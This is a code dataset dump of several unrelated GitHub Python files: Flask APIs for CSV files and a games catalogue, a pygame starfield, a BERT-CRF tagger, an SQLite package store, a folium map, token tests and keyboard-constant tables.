seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
19771467472 | from flask import Flask, jsonify, request, send_from_directory
from flask_cors import CORS
import os
import dateData
import csvContent
from utilFunctions import *
import json
DEBUG = True
UPLOAD_FOLDER = './uploads/'
UPLOADS_DATE_DATA_PATH = 'resources/uploadDates.txt'
app = Flask(__name__)
app.config.from_object(__name__)
# ToDo investigate security risk of CORS, does security matter for a short project?
cors = CORS(app, supports_credentials=True)
# Get list of prev uploaded files
@app.route('/csv', methods=['GET'])
def getAllCsvFiles():
csvDataList = []
createFileIfNotInit(UPLOADS_DATE_DATA_PATH)
with open(UPLOADS_DATE_DATA_PATH, "r") as file:
for line in file.readlines():
nameDate = line.split(': ')
formattedDateTime = nameDate[0].split(".")[0]
dateDataObject = dateData.createDateData(nameDate[1], formattedDateTime)
csvDataList.append(dateDataObject.__dict__)
return jsonify({
'status': 'success',
'csvDataList': csvDataList
})
# Upload a file
@app.route('/csv', methods=['POST'])
def handleUploadedCsvFile():
if not request.files:
return "File not found", 400
for key, file in request.files.items():
if key == '':
return "File not found", 400
elif file and allowedFile(key):
saveCsvFile(file, key)
return "File(s) read succesfully", 200
# Download a file
@app.route('/csv/download/<fileName>', methods=['GET'])
def downloadFile(fileName):
if os.path.isfile(UPLOAD_FOLDER + fileName):
return send_from_directory(app.config["UPLOAD_FOLDER"], fileName)
else:
return "File not Found", 404
# View a file
@app.route('/csv/view/<fileName>/<pageNumber>', methods=['GET'])
def viewFile(fileName, pageNumber):
pageNumber = int(pageNumber) + 1
if os.path.isfile(UPLOAD_FOLDER + fileName) and pageNumber > 0:
csvContentList = []
with open(UPLOAD_FOLDER + fileName, 'r') as file:
lines = file.readlines()
lines = lines[1:]
numberOfRows = len(lines)
pageNumber = checkValidPageNumber(pageNumber, numberOfRows)
startingRow = max(min(pageNumber*500, numberOfRows) - 500, 0)
endingRow = min(pageNumber*500, numberOfRows)
#The below line handles indexing through all rows in the file, 500 rows at a time
for i in range(startingRow, endingRow):
line = lines[i]
line = line.split(',')
contentObject = csvContent.createCsvContent(line[0],line[1],line[2],line[3],line[4],
line[5],line[6],line[7],line[8],line[9],line[10].strip())
csvContentList.append(contentObject.__dict__)
return jsonify({
'status': 'success',
'csvContentList': csvContentList,
'pageNumber': pageNumber
})
else:
return "File not Found", 404
# Delete a file
@app.route('/csv/delete/<fileName>', methods=['DELETE'])
def deleteFile(fileName):
clearDataFromUploadDate(fileName)
clearDataFromYearStats(fileName)
if os.path.isfile(UPLOAD_FOLDER + fileName):
os.remove(UPLOAD_FOLDER + fileName)
return "Success", 200
else:
return "File not Found", 404
# Get files year stats
@app.route('/csv/stats/<fileName>', methods=['GET'])
def getFilesStats(fileName):
path = getStatsPath(fileName)
if not os.path.exists(path):
return "File not Found", 404
else:
with open(path, "r") as file:
csvYearStats = json.loads(file.read())
return jsonify({
'status': 'success',
'csvYearStats': csvYearStats
})
if __name__ == '__main__':
app.run() | Eamon-Crawford/flaskVueProject | server/app.py | app.py | py | 3,713 | python | en | code | 0 | github-code | 90 |
9017751390 | from flask import Flask, render_template
from flask_restful import Api
from db import db
from resources.game import GameByCategory, GameByPlatform, GameList
from resources.checkhealth import CheckHealth
from resources.recreate import ReCreateSchema
import os
import logging
import logging.config
import watchtower
import hvac
import pymysql
import urllib.request
import boto3
AWS_REGION_NAME = 'eu-west-1'
boto3_logs_client = boto3.client("logs", region_name=AWS_REGION_NAME)
log_level = {
'CRITICAL' : 50,
'ERROR' : 40,
'WARN' : 30,
'INFO' : 20,
'DEBUG' : 10
}
logger = logging.getLogger("werkzeug")
app = Flask("CloudSchool-App")
app.config.from_pyfile("app.conf", silent=False)
RAPID_API_KEY = app.config.get("RAPID_API_KEY")
END_POINT = app.config.get("END_POINT")
MYSQL_ENDPOINT = (app.config.get("MYSQL_ENDPOINT")).split(":")[0]
LOG_LEVEL = app.config.get("LOG_LEVEL")
SCHEMA_NAME = app.config.get("SCHEMA_NAME")
VAULT_ENDPOINT = app.config.get("VAULT_ENDPOINT")
VAULT_TOKEN = app.config.get("VAULT_TOKEN")
VAULT_PATH_TO_CREDS = app.config.get("VAULT_PATH_TO_CREDS")
APPLICATION_VERSION = app.config.get("APPLICATION_VERSION")
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://' #'sqlite:///data.db'
#app.config['SQLALCHEMY_BINDS'] = {SCHEMA_NAME: SQL_CONNECTION_STRING + SCHEMA_NAME}
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['PROPAGATE_EXCEPTIONS'] = True
VAULT_CLIENT = hvac.Client(url=VAULT_ENDPOINT, token=VAULT_TOKEN)
api = Api(app)
api.add_resource(GameByCategory, '/category/<string:name>')
api.add_resource(GameByPlatform, '/platform/<string:name>')
api.add_resource(GameList, '/games')
api.add_resource(CheckHealth, '/checkhealth')
api.add_resource(ReCreateSchema, '/recreate')
@app.errorhandler(404)
def not_found(error):
return render_template('error.html'), 404
@app.errorhandler(500)
def not_found500(error):
return render_template('error.html'), 500
@app.before_first_request
def create_tables():
logger.info("Preparing database {}...".format(db))
db.session.execute(f"CREATE DATABASE IF NOT EXISTS {SCHEMA_NAME}")
db.create_all()
def _get_db_connector():
logger.info('Get credentials for database from Vault')
resp = VAULT_CLIENT.read(VAULT_PATH_TO_CREDS)
host = MYSQL_ENDPOINT
user= resp['data']['username']
password = resp['data']['password']
connection = pymysql.connect(host=host,
user=user,
password=password,
database=SCHEMA_NAME)
return connection
app.config['SQLALCHEMY_ENGINE_OPTIONS'] = {"creator" : _get_db_connector}
logging.basicConfig(
level=log_level[LOG_LEVEL],
format='%(asctime)s - %(levelname)8s - %(name)9s - %(funcName)15s - %(message)s'
)
instanceid = "local"
try:
instanceid = urllib.request.urlopen('http://169.254.169.254/latest/meta-data/instance-id').read().decode()
except:
pass
handler = watchtower.CloudWatchLogHandler(stream_name=f"AppVersion-{APPLICATION_VERSION}-werkzeug-{instanceid}", log_group_name=app.name, boto3_client=boto3_logs_client)
app.logger.addHandler(handler)
logging.getLogger("werkzeug").addHandler(handler)
db.init_app(app)
logger.info('Starting Flask server on {} listening on port {}'.format('0.0.0.0', '5000'))
if __name__ == '__main__':
app.run() #host= "0.0.0.0", port = 5000, debug=True) | EliranKasif/CloudSchool-PythonRestApi | app.py | app.py | py | 3,380 | python | en | code | 0 | github-code | 90 |
3618138444 | """
This module contains the Level class.
Drawing and updating of actors should occur here.
"""
import pygame as pg
from data.core import tools
from . import constants
class Level(object):
"""
This class represents the whole starscape. The starscape consists of
three star layers. The player is drawn and updated by this class.
The player is contained in a pg.sprite.GroupSingle group.
"""
def __init__(self, viewport, player):
self.image = constants.GFX["big_stars"].copy()
self.rect = self.image.get_rect()
player.rect.center = self.rect.center
player.true_pos = list(player.rect.center)
self.player_singleton = pg.sprite.GroupSingle(player)
self.make_layers()
self.viewport = viewport
self.update_viewport(True)
self.mid_viewport = self.viewport.copy()
self.mid_true = list(self.mid_viewport.topleft)
self.base_viewport = self.viewport.copy()
self.base_true = list(self.base_viewport.topleft)
def make_layers(self):
"""
Create the middle and base image of the stars.
self.image scrolls with the player, self.mid_image scrolls at
half the speed, and self.base always stays fixed.
"""
w, h = self.image.get_size()
shrink = pg.transform.smoothscale(self.image, (w//2, h//2))
self.mid_image = tools.tile_surface((w,h), shrink, True)
shrink = pg.transform.smoothscale(self.image, (w//4, h//4))
self.base = tools.tile_surface((w,h), shrink, True)
def update(self, keys, dt):
"""
Updates the player and then adjusts the viewport with respect to the
player's new position.
"""
self.player_singleton.update(keys, self.rect, dt)
self.update_viewport()
def update_viewport(self, start=False):
"""
The viewport will stay centered on the player unless the player
approaches the edge of the map.
"""
old_center = self.viewport.center
self.viewport.center = self.player_singleton.sprite.rect.center
self.viewport.clamp_ip(self.rect)
change = (self.viewport.centerx-old_center[0],
self.viewport.centery-old_center[1])
if not start:
self.mid_true[0] += change[0]*0.5
self.mid_true[1] += change[1]*0.5
self.mid_viewport.topleft = self.mid_true
self.base_true[0] += change[0]*0.1
self.base_true[1] += change[1]*0.1
self.base_viewport.topleft = self.base_true
def draw(self, surface):
"""
Blit and clear actors on the self.image layer.
Then blit appropriate viewports of all layers.
"""
self.player_singleton.clear(self.image, clear_callback)
self.player_singleton.draw(self.image)
surface.blit(self.base, (0,0), self.base_viewport)
surface.blit(self.mid_image, (0,0), self.mid_viewport)
surface.blit(self.image, (0,0), self.viewport)
def clear_callback(surface, rect):
"""
We need this callback because the clearing background contains
transparency. We need to fill the rect with transparency first.
"""
surface.fill((0,0,0,0), rect)
surface.blit(constants.GFX["big_stars"], rect, rect)
| reddit-pygame/Python_Arcade_Collab | data/games/space_war/level.py | level.py | py | 3,307 | python | en | code | 3 | github-code | 90 |
7895865285 | import requests
def test_permission_basic(token, host):
res1 = requests.get(
host + '/api/2.0/libraries/all-cluster-statuses',
auth=('token', token),
)
assert res1.status_code == 200
def test_permission_admin(token, host):
res1 = requests.get(
host + '/api/1.2/libraries/list',
auth=('token', token),
)
assert res1.status_code == 200
library_id = res1.json()[0]['id']
res2 = requests.get(
host + '/api/1.2/libraries/status?libraryId={}'
.format(library_id),
auth=('token', token),
)
assert res2.status_code == 200
| ShopRunner/stork | tests/test_token_permissions.py | test_token_permissions.py | py | 615 | python | en | code | 47 | github-code | 90 |
15027641634 | # -*- coding:utf-8 -*-
import sys
sys.path.append("../")
from pytorch_transformers import BertModel
import torch
import torch.nn as nn
from model.base_model import base_model
from torchcrf import CRF
sys.path.append("../")
from layers.utensil import _generate_mask
class bert_crf(base_model):
def __init__(self, pretrain_model_path = None, pretrain_output_size = 768,
batch_first = True, lable_num = 4, device = "cpu"):
super(bert_crf, self).__init__()
self.bert = BertModel.from_pretrained(pretrain_model_path)
self.linear = nn.Linear(pretrain_output_size, lable_num)
self.crf = CRF(lable_num, batch_first = batch_first)
self.device = device
print("模型加载完成")
def forward(self, x):
x = x.to(self.device).long()
segments_ids = torch.zeros(x.shape, dtype=torch.long).to(self.device)
emb_outputs = self.bert(x, token_type_ids=segments_ids)
linear_output = self.linear(emb_outputs[0])
return linear_output
def get_loss(self, linear_output, max_len, sen_len, y = None, use_cuda = True):
y = y.to(self.device).long()
log_likelihood = self.crf(linear_output, y,
mask=_generate_mask(sen_len, max_len, use_cuda),
reduction='mean')
return -log_likelihood
@torch.no_grad()
def decode(self, dev_x, max_len = None, sen_len = None, use_cuda = None, dev_y = None):
dev_x = torch.tensor(dev_x, dtype=torch.long).to(self.device)
output = self.forward(x = dev_x)
loss = None
if dev_y != None:
dev_y = torch.tensor(dev_y, dtype=torch.long).to(self.device)
loss = self.get_loss(output, max_len, sen_len, y = dev_y, use_cuda = use_cuda)
return self.crf.decode(output, mask=_generate_mask(sen_len, max_len, use_cuda)), loss | cfy201696/Craig-Ai | model/bert_crf.py | bert_crf.py | py | 1,960 | python | en | code | 0 | github-code | 90 |
452185985 | import contextlib
import functools
import os
import re
import shutil
import sqlite3
import time
class DatabaseException(Exception):
pass
# Checks that a value represents a valid project, version, or file name.
def validate_name(name):
if name in ('.', '..'):
raise DatabaseException('Invalid name')
name_regex = re.compile('^[0-9a-zA-Z_.-]+$')
if not name_regex.search(name):
raise DatabaseException('Invalid name')
# Checks that a value represents a valid SHA-256 hash.
def validate_sha256(sha256):
sha256_regex = re.compile('^[0-9a-f]{64}$')
if not sha256_regex.search(sha256):
raise DatabaseException('Invalid SHA-256 hash')
# Checks that a value represents a valid star state.
def validate_star(star):
if star is not True and star is not False:
raise DatabaseException('Invalid star state')
# SQLite-backed database to handle projects, versions, and files.
class Database:
def __init__(self, database_dir):
self.database_dir = database_dir
self.database_file = os.path.join(
self.database_dir, 'packages.db')
# Creates or resets the database.
def create(self):
self.delete()
os.mkdir(self.database_dir)
self.create_schema()
# Deletes the database.
def delete(self):
shutil.rmtree(self.database_dir, ignore_errors=True)
# Initializes the database connection.
def open(self):
self.connection = sqlite3.connect(
self.database_file, isolation_level=None)
self.cursor = self.connection.cursor()
self.cursor.execute('PRAGMA foreign_keys=ON')
self.cursor.execute('PRAGMA journal_mode=WAL')
self.cursor.execute('PRAGMA busy_timeout=10000')
# Closes the database connection.
def close(self):
self.connection.close()
# Decorator for the methods working on an open database. Opens the
# database before use and closes it afterwards, even if the method
# raised an exception.
def database_context_manager(method):
@contextlib.contextmanager
def context_manager(database):
database.open()
yield database
database.close()
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
with context_manager(self) as database:
return method(database, *args, **kwargs)
return wrapper
# Creates the database schema.
@database_context_manager
def create_schema(self):
self.cursor.execute('''
CREATE TABLE IF NOT EXISTS projects(
id INTEGER PRIMARY KEY,
name TEXT NOT NULL,
CONSTRAINT unique_project UNIQUE (name)
)''')
self.cursor.execute('''
CREATE TABLE IF NOT EXISTS versions(
id INTEGER PRIMARY KEY,
project_id INTEGER,
name TEXT NOT NULL,
timestamp INTEGER NOT NULL,
star BOOLEAN DEFAULT 0,
FOREIGN KEY(project_id) REFERENCES projects(id),
CONSTRAINT unique_version UNIQUE (project_id, name)
)
''')
self.cursor.execute('''
CREATE TABLE IF NOT EXISTS files(
id INTEGER PRIMARY KEY,
version_id INTEGER,
name TEXT NOT NULL,
sha256 TEXT NOT NULL,
FOREIGN KEY(version_id) REFERENCES versions(id)
ON DELETE CASCADE,
CONSTRAINT unique_file UNIQUE (version_id, name)
)
''')
# Creates a new file.
# Automatically creates the project and version if required.
# The age in seconds should only be specified when testing.
@database_context_manager
def create_file(
self, project_name, version_name, file_name,
sha256, age=0):
# Validates the parameters.
validate_name(project_name)
validate_name(version_name)
validate_name(file_name)
validate_sha256(sha256)
# Initializes the timestamp.
timestamp = int(time.time()) - age
# Starts a transaction.
self.cursor.execute('BEGIN')
# Creates the project if it does not exist.
sql = 'INSERT OR IGNORE INTO projects(name) VALUES(?)'
params = [project_name]
self.cursor.execute(sql, params)
# Retrieves the project.
sql = 'SELECT id FROM projects WHERE name=?'
params = [project_name]
rows = list(self.cursor.execute(sql, params))
assert len(rows) == 1
project_id = rows[0][0]
# Creates the version if it does not exist.
sql = '''
INSERT OR IGNORE
INTO versions(project_id, name, timestamp)
VALUES(?, ?, ?)
'''
params = [project_id, version_name, timestamp]
self.cursor.execute(sql, params)
# Retrieves the version.
sql = '''
SELECT id FROM versions
WHERE project_id=? AND name=?
'''
params = [project_id, version_name]
rows = list(self.cursor.execute(sql, params))
assert len(rows) == 1
version_id = rows[0][0]
# Creates the file.
sql = '''
INSERT INTO files(version_id, name, sha256)
VALUES(?, ?, ?)
'''
params = [version_id, file_name, sha256]
try:
self.cursor.execute(sql, params)
self.cursor.execute('COMMIT')
except sqlite3.IntegrityError:
self.cursor.execute('ROLLBACK')
raise DatabaseException('Unable to create file')
# Retrieves the SHA-256 hash of a file.
@database_context_manager
def retrieve_file_sha256(self, project_name, version_name, file_name):
# Validates the parameters.
validate_name(project_name)
validate_name(version_name)
validate_name(file_name)
# Retrieves the file.
sql = '''
SELECT files.sha256 FROM projects
INNER JOIN versions ON projects.id=versions.project_id
INNER JOIN files ON versions.id=files.version_id
WHERE projects.name=? AND versions.name=? AND files.name=?
'''
params = [project_name, version_name, file_name]
rows = list(self.cursor.execute(sql, params))
if len(rows) != 1:
raise DatabaseException('File not found')
sha256 = rows[0][0]
return sha256
# Retrieves all the projects.
# The results are in alphabetical order.
@database_context_manager
def retrieve_projects(self):
sql = 'SELECT name FROM projects ORDER BY name ASC'
rows = list(self.cursor.execute(sql))
projects = [{
'name': row[0]} for row in rows]
return projects
# Retrieves all the versions (name, date, star) for a project.
# The results are sorted in reverse chronological order.
@database_context_manager
def retrieve_versions(self, project_name):
# Validates the parameter.
validate_name(project_name)
# Starts a transaction.
self.cursor.execute('BEGIN')
# Retrieves the project.
sql = 'SELECT id FROM projects WHERE name=?'
params = [project_name]
rows = list(self.cursor.execute(sql, params))
if len(rows) != 1:
self.cursor.execute('ROLLBACK')
raise DatabaseException('Project not found')
project_id = rows[0][0]
# Retrieves the versions.
sql = '''
SELECT name, timestamp, star FROM versions
WHERE project_id=? ORDER BY timestamp DESC
'''
params = [project_id]
rows = list(self.cursor.execute(sql, params))
versions = [{
'name': row[0],
'timestamp': row[1],
'star': row[2]} for row in rows]
# Commits the transaction.
self.cursor.execute('COMMIT')
return versions
# Retrieves all the files (name, sha256) for a version.
# The results are sorted in alphabetical order.
@database_context_manager
def retrieve_files(self, project_name, version_name):
# Validates the parameters.
validate_name(project_name)
validate_name(version_name)
# Starts a transaction.
self.cursor.execute('BEGIN')
# Retrieves the version.
sql = '''
SELECT versions.id FROM versions
INNER JOIN projects ON projects.id=versions.project_id
WHERE projects.name=? and versions.name=?
'''
params = [project_name, version_name]
rows = list(self.cursor.execute(sql, params))
if len(rows) != 1:
self.cursor.execute('ROLLBACK')
raise DatabaseException('Version not found')
version_id = rows[0][0]
# Retrieves the files.
sql = '''
SELECT name, sha256 FROM files
WHERE version_id=? ORDER BY name ASC
'''
params = [version_id]
rows = list(self.cursor.execute(sql, params))
files = [{
'name': row[0],
'sha256': row[1]} for row in rows]
# Commits the transaction.
self.cursor.execute('COMMIT')
return files
# Retrieves all the known SHA-256 hashes.
@database_context_manager
def retrieve_sha256s(self):
sql = 'SELECT DISTINCT sha256 FROM files'
rows = list(self.cursor.execute(sql))
return [row[0] for row in rows]
# Star/unstar a version.
@database_context_manager
def update_star(self, project_name, version_name, star):
# Validates the parameters.
validate_name(project_name)
validate_name(version_name)
validate_star(star)
# Starts a transaction.
self.cursor.execute('BEGIN IMMEDIATE')
# Retrieves the version.
sql = '''
SELECT versions.id FROM versions
INNER JOIN projects ON projects.id=versions.project_id
WHERE projects.name=? and versions.name=?
'''
params = [project_name, version_name]
rows = list(self.cursor.execute(sql, params))
if len(rows) != 1:
self.cursor.execute('ROLLBACK')
raise DatabaseException('Version not found')
version_id = rows[0][0]
# Updates the star.
sql = 'UPDATE versions SET star=? WHERE id=?'
params = [star, version_id]
self.cursor.execute(sql, params)
# Commits the transaction.
self.cursor.execute('COMMIT')
# Deletes the obsolete versions (i.e.: with no star
# and older than the specified age in seconds).
@database_context_manager
def delete_obsolete_versions(self, age=0):
# Initializes the timestamp.
timestamp = int(time.time()) - age
# Deletes the versions.
sql = '''
DELETE FROM versions
WHERE star=? AND timestamp<=?
'''
params = [False, timestamp]
self.cursor.execute(sql, params)
| marcv81/tempstore | tempstore/database.py | database.py | py | 11,121 | python | en | code | 0 | github-code | 90 |
21792986406 | import folium
import os
import json
m = folium.Map(locaiton=[42.3601, -71.0589], zoom_start=12)
#Vega Visualisation
vis = os.path.join('data','vis.json')
#global tooltip
tooltip = 'click for more info'
#create markers
folium.Marker([42.363600, -71.099500],
popup='<strong>location1</strong>',
tooltip=tooltip).add_to(m)
folium.Marker([42.333600, -71.109500],
popup='<strong>location2</strong>',
tooltip=tooltip,
icon = folium.Icon(icon='cloud')).add_to(m)
folium.Marker([42.315140, -71.072450],
popup=folium.Popup(max_width=450).add_child(folium.Vega(json.load(open(vis))))).add_to(m)
#circle marker
folium.CircleMarker(
location=[42.466470, -70.942110],
radius = 50,
popup='My Birthplace',
color= '#428bca',
fill=True,
fill_color='#428bva',
).add_to(m)
m.save('map.html') | AGeeson/GeoProjects | foliumtest/map.py | map.py | py | 800 | python | en | code | 0 | github-code | 90 |
27222336998 | import string
import services
import sims4.commands
from sims4.collections import AttributeDict
from sims4.localization import LocalizationHelperTuning
from sims4.tuning.tunable import HasTunableSingletonFactory, AutoFactoryInit
from ui.ui_dialog import UiDialog, UiDialogOkCancel
from ui.ui_dialog_generic import UiDialogTextInputOkCancel
from ui.ui_text_input import UiTextInput
from scripts_core.sc_util import ld_notice
class JargonKeys(object):
BANG = '!'
SHRIEK = '!'
DOUBLE_QUOTE = '"'
QUOTE = '"'
NUMBER_SIGN = '#'
SHARP = '#'
OCTOTHORPE = '#'
BUCK = '$'
CASH = '$'
STRING = '$'
MOD = '%'
GRAPES = '%'
AMPERSAND = '&'
AMP = '&'
AND_SIGN = '&'
APOSTROPHE = '\''
PRIME = '\''
TICK = '\''
STAR = '*'
SPLAT = '*'
GLOB = '*'
ADD = '+'
class IntercalKeys(object):
SPOT = '.'
TWO_SPOT = ':'
TAIL = ','
HYBRID = ';'
MESH = '#'
HALF_MESH = '='
SPARK = '\''
BACKSPARK = '`'
WOW = '!'
WHAT = '?'
RABBIT_EARS = '"'
# RABBIT is `"` over `.`
SPIKE = '|'
DOUBLE_OH_SEVEN = '%'
WORM = '-'
ANGLE = '<'
RIGHT_ANGLE = '>'
WAX = '('
WANE = ')'
U_TURN = '['
U_TURN_BACK = ']'
EMBRACE = '{'
BRACELET = '}'
SPLAT = '*'
AMPERSAND = '&'
V = 'V'
BOOK = 'V'
# BOOKWORM is `-` over `V`
BIG_MONEY = '$'
# CHANGE is cent sign
SQUIGGLE = '~'
FLAT_WORM = '_'
# OVERLINE is line on top
INTERSECTION = '+'
SLAT = '/'
BACKSLAT = '\\'
WHIRLPOOL = '@'
# HOOKWORK is logical NOT symbol
SHARK = '^'
SHARKFIN = '^'
# BLOTCH is several characters smashed on top of each other
class UnicodeAsciiKeys(object):
NULL = '\x00'
START_OF_HEADING = '\x01'
START_OF_TEXT = '\x02'
END_OF_TEXT = '\x03'
END_OF_TRANSMISSION = '\x04'
ENQUIRY = '\x05'
ACKNOWLEDGE = '\x06'
BELL = '\x07'
BACKSPACE = '\x08'
CHARACTER_TABULATION = '\t'
HORIZONTAL_TABULATION = '\t'
TAB = '\t'
LINE_FEED = '\n'
NEW_LINE = '\n'
END_OF_LINE = '\n'
LINE_TABULATION = '\x0b'
VERTICAL_TABULATION = '\x0b'
FORM_FEED = '\x0c'
CARRIAGE_RETURN = '\r'
SHIFT_OUT = '\x0e'
SHIFT_IN = '\x0f'
DATA_LINK_ESCAPE = '\x10'
DEVICE_CONTROL_ONE = '\x11'
DEVICE_CONTROL_TWO = '\x12'
DEVICE_CONTROL_THREE = '\x13'
DEVICE_CONTROL_FOUR = '\x14'
NEGATIVE_ACKNOWLEDGE = '\x15'
SYNCHRONOUS_IDLE = '\x16'
END_OF_TRANSMISSION_BLOCK = '\x17'
CANCEL = '\x18'
END_OF_MEDIUM = '\x19'
SUBSTITUTE = '\x1a'
ESCAPE = '\x1b'
INFORMATION_SEPARATOR_FOUR = '\x1c'
FILE_SEPARATOR = '\x1c'
INFORMATION_SEPARATOR_THREE = '\x1d'
GROUP_SEPARATOR = '\x1d'
INFORMATION_SEPARATOR_TWO = '\x1e'
RECORD_SEPARATOR = '\x1e'
INFORMATION_SEPARATOR_ONE = '\x1f'
UNIT_SEPARATOR = '\x1f'
SPACE = ' '
EXCLAMATION_MARK = '!'
FACTORIAL = '!'
BANG = '!'
QUOTATION_MARK = '"'
NUMBER_SIGN = '#'
POUND_SIGN = '#'
HASH = '#'
CROSSHATCH = '#'
OCTOTHORPE = '#'
DOLLAR_SIGN = '$'
ESCUDO = '$'
PERCENT_SIGN = '%'
AMPERSAND = '&'
APOSTROPHE = "'"
APOSTROPHE_QUOTE = "'"
APL_QUOTE = "'"
LEFT_PARENTHESIS = '('
OPENING_PARENTHESIS = '('
RIGHT_PARENTHESIS = ')'
CLOSING_PARENTHESIS = ')'
ASTERISK = '*'
STAR = '*'
PLUS_SIGN = '+'
COMMA = ','
DECIMAL_SEPARATOR = ','
HYPHEN_MINUS = '-'
HYPHEN_OR_MINUS_SIGN = '-'
FULL_STOP = '.'
PERIOD = '.'
DOT = '.'
DECIMAL_POINT = '.'
SOLIDUS = '/'
SLASH = '/'
VIRGULE = '/'
DIGIT_ZERO = '0'
DIGIT_ONE = '1'
DIGIT_TWO = '2'
DIGIT_THREE = '3'
DIGIT_FOUR = '4'
DIGIT_FIVE = '5'
DIGIT_SIX = '6'
DIGIT_SEVEN = '7'
DIGIT_EIGHT = '8'
DIGIT_NINE = '9'
COLON = ':'
SEMICOLON = ';'
LESS_THAN_SIGN = '<'
EQUALS_SIGN = '='
GREATER_THAN_SIGN = '>'
QUESTION_MARK = '?'
COMMERCIAL_AT = '@'
AT_SIGN = '@'
LATIN_CAPITAL_LETTER_A = 'A'
LATIN_CAPITAL_LETTER_B = 'B'
LATIN_CAPITAL_LETTER_C = 'C'
LATIN_CAPITAL_LETTER_D = 'D'
LATIN_CAPITAL_LETTER_E = 'E'
LATIN_CAPITAL_LETTER_F = 'F'
LATIN_CAPITAL_LETTER_G = 'G'
LATIN_CAPITAL_LETTER_H = 'H'
LATIN_CAPITAL_LETTER_I = 'I'
LATIN_CAPITAL_LETTER_J = 'J'
LATIN_CAPITAL_LETTER_K = 'K'
LATIN_CAPITAL_LETTER_L = 'L'
LATIN_CAPITAL_LETTER_M = 'M'
LATIN_CAPITAL_LETTER_N = 'N'
LATIN_CAPITAL_LETTER_O = 'O'
LATIN_CAPITAL_LETTER_P = 'P'
LATIN_CAPITAL_LETTER_Q = 'Q'
LATIN_CAPITAL_LETTER_R = 'R'
LATIN_CAPITAL_LETTER_S = 'S'
LATIN_CAPITAL_LETTER_T = 'T'
LATIN_CAPITAL_LETTER_U = 'U'
LATIN_CAPITAL_LETTER_V = 'V'
LATIN_CAPITAL_LETTER_W = 'W'
LATIN_CAPITAL_LETTER_X = 'X'
LATIN_CAPITAL_LETTER_Y = 'Y'
LATIN_CAPITAL_LETTER_Z = 'Z'
LEFT_SQUARE_BRACKET = '['
OPENING_SQUARE_BRACKET = '['
REVERSE_SOLIDUS = '\\'
BACKSLASH = '\\'
RIGHT_SQUARE_BRACKET = ']'
CLOSING_SQUARE_BRACKET = ']'
CIRCUMFLEX_ACCENT = '^'
LOW_LINE = '_'
SPACING_UNDERSCORE = '_'
GRAVE_ACCENT = '`'
LATIN_SMALL_LETTER_A = 'a'
LATIN_SMALL_LETTER_B = 'b'
LATIN_SMALL_LETTER_C = 'c'
LATIN_SMALL_LETTER_D = 'd'
LATIN_SMALL_LETTER_E = 'e'
LATIN_SMALL_LETTER_F = 'f'
LATIN_SMALL_LETTER_G = 'g'
LATIN_SMALL_LETTER_H = 'h'
LATIN_SMALL_LETTER_I = 'i'
LATIN_SMALL_LETTER_J = 'j'
LATIN_SMALL_LETTER_K = 'k'
LATIN_SMALL_LETTER_L = 'l'
LATIN_SMALL_LETTER_M = 'm'
LATIN_SMALL_LETTER_N = 'n'
LATIN_SMALL_LETTER_O = 'o'
LATIN_SMALL_LETTER_P = 'p'
LATIN_SMALL_LETTER_Q = 'q'
LATIN_SMALL_LETTER_R = 'r'
LATIN_SMALL_LETTER_S = 's'
LATIN_SMALL_LETTER_T = 't'
LATIN_SMALL_LETTER_U = 'u'
LATIN_SMALL_LETTER_V = 'v'
LATIN_SMALL_LETTER_W = 'w'
LATIN_SMALL_LETTER_X = 'x'
LATIN_SMALL_LETTER_Y = 'y'
LATIN_SMALL_LETTER_Z = 'z'
LEFT_CURLY_BRACKET = '{'
OPENING_CURLY_BRACKET = '{'
LEFT_BRACE = '{'
VERTICAL_LINE = '|'
VERTICAL_BAR = '|'
RIGHT_CURLY_BRACKET = '}'
CLOSING_CURLY_BRACKET = '}'
RIGHT_BRACE = '}'
TILDE = '~'
DELETE = '\x7f'
ASCII_NAMES = {
'\t': 'tab',
' ': 'space', # 0x20
'!': 'exclamation', # 0x21
'"': 'double quote', # 0x22
'#': 'hash', # 0x23
'$': 'dollar', # 0x24
'%': 'percent', # 0x25
'&': 'ampersand', # 0x26
'\'': 'single quote', # 0x27
'(': 'open paren', # 0x28
')': 'close paren', # 0x29
'*': 'asterisk', # 0x2a
'+': 'plus', # 0x2b
',': 'comma', # 0x2c
'-': 'minus', # 0x2d
'.': 'period', # 0x2e
'/': 'slash', # 0x2f
':': 'colon', # 0x3a
';': 'semicolon', # 0x3b
'<': 'less than', # 0x3c
'=': 'equals', # 0x3d
'>': 'greater than', # 0x3e
'?': 'question', # 0x3f
'@': 'at', # 0x40
'[': 'left bracket', # 0x5b
'\\': 'backslash', # 0x5c
']': 'right bracket', # 0x5d
'^': 'caret', # 0x5e
'_': 'underscore', # 0x5f
'`': 'backtick', # 0x60
'{': 'left brace', # 0x7b
'|': 'pipe', # 0x7c
'}': 'right brace', # 0x7d
'~': 'tilde', # 0x7e
}
class AlternativeUnixFunctionKeys(object):
# Unsure origin: alternate V220 mode?
F1 = '\x1bO11~'
F2 = '\x1bO12~'
F3 = '\x1bO13~'
F4 = '\x1bO14~'
F5 = '\x1bO15~'
F6 = '\x1bO17~'
F7 = '\x1bO18~'
F8 = '\x1bO19~'
F9 = '\x1bO20~'
F10 = '\x1bO21~'
F11 = '\x1bO23~'
F12 = '\x1bO24~'
class WindowsKeys(object):
ESC = '\x1b'
LEFT = '\xe0K'
RIGHT = '\xe0M'
UP = '\xe0H'
DOWN = '\xe0P'
ENTER = '\r'
BACKSPACE = '\x08'
SPACE = ' '
F1 = '\x00;'
F2 = '\x00<'
F3 = '\x00='
F4 = '\x00>'
F5 = '\x00?'
F6 = '\x00@'
F7 = '\x00A'
F8 = '\x00B'
F9 = '\x00C'
F10 = '\x00D'
F11 = '\xe0\x85'
F12 = '\xe0\x86'
INSERT = '\xe0R'
DELETE = '\xe0S'
PAGE_UP = '\xe0I'
PAGE_DOWN = '\xe0Q'
HOME = '\xe0G'
END = '\xe0O'
CTRL_F1 = '\x00^'
CTRL_F2 = '\x00_'
CTRL_F3 = '\x00`'
CTRL_F4 = '\x00a'
